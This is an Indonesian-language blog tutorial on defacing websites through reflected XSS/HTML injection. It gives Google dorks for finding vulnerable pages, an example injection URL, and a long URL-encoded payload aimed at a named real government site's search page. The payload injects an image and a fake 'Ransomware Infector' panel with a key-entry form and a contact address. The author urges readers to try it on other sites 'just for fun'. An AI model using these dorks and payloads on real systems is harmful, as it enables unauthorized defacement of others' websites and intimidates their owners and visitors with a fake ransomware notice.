Deface Metode Xss
Cara Deface Metode Xss
-Penjelasan
XSS (cross site scripting) merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.
tapi dalam tutorial kali ini saya tidak mengajarkan xss yg sebenarnya..saya hanya mengajarkan deface atau merubah tampilan web nya saja oke
dork
- inurl:news.php?id=
- inurl:"/showcatrows.php?CategoryID="
(kembangkan)
Langkah Langkah
1.Dorking/search Di google menggunakan dork di atas
2.Lalu Tambahkan Kode Html di belakang
contoh http://www.target.com/show.php?CategoryID=5"><marquee><h1>Xss By Sad Boy 1922</h1></marquee>
jika Muncul Hasil dari html yg kamu injeksikan berarti vuln
lalu kalian bisa kembangkan dengan menambahkan Gambar,background bahkan alert(use your brain;v)
contoh saya injeksi di bagian search
http://kpu-kampar.go.id/pencarian?q=+<center><img+src%3D"+https%3A%2F%2F3.bp.blogspot.com%2F-A8VAJ5ySsB0%2FXLynw1zeM0I%2FAAAAAAAAAew%2FVacQcG7afGIBmErDchvDypulTBlZ5L-JACLcBGAs%2Fs1600%2FSad%252BBoy.png+"+width%3D"150"+height%3D"150"><center>+++++++++<center>+<font+color%3D"aqua"+style%3D"text-shadow%3A+3px+3px+9px+%2319f211%3B+font-size%3A+12px%3B">+<pre>+%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3DRansomware+Infector%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D+++++++++++++++++++++++++++++++++<%2Ffont>+++++++++++++++++++++++++++++++++++++++++++++++++++++-%5B+Contact+%3A+<font+color%3D"aqua"+style%3D"text-shadow%3A+3px+3px+9px+%2319f211%3B+font-size%3A+12px%3B">rayw1912%40gmail.com+<%2Ffont>%5D-+<%2Fpre>+<%2Fpre>+<%2Ffont>+++++++++++++++++++++++++++++++++++++++++++++++++++Ransomware++-%5B+Fuction+%3A+<font+color%3D"%2319f211"+style%3D"text-shadow%3A+3px+3px+9px+%2319f211%3B+font-size%3A+12px%3B">Encrypt+all+data+<%2Ffont>%5D-+<%2Fpre>+<form+action%3D""+method%3D"post"+style%3D"+text-align%3A+center%3B">+<font+color%3D"white">+++++++<label>Key+%3A+<%2Flabel>+++++++<input+type%3D"text"+name%3D"Password"+class%3D"inpute"+placeholder%3D"Input+Password+Here">+++++++<select+name%3D"method"+class%3D"selecte">++++++++++<option+value%3D"1">Actifated<%2Foption>++++++++++<option+value%3D"2">Non+Actifated<%2Foption>+++++++<%2Fselect>+++++++<input+type%3D"submit"+name%3D"submit"+class%3D"submite"+value%3D"Submit"+%2F>+<%2Fform>
catatan:kalian juga bisa coba xss di beberapa website yg memiliki fitur search...karena rata rata website yg bisa di xss ada di bagian fitur searchnya hehe:v
web yg bisa kalian coba:v
catatan lagi:ini bukan xss yg sebenernya gan:v..xss yg sebenernya bukan sskedar menginjeksikan kode html..melainkan untuk mendapatkan celah agar web tersebut bisa di retas:v...beda dengan yang saya praktekan:v..tapi just for fun aja:)
Belum ada Komentar untuk "Deface Metode Xss"
Posting Komentar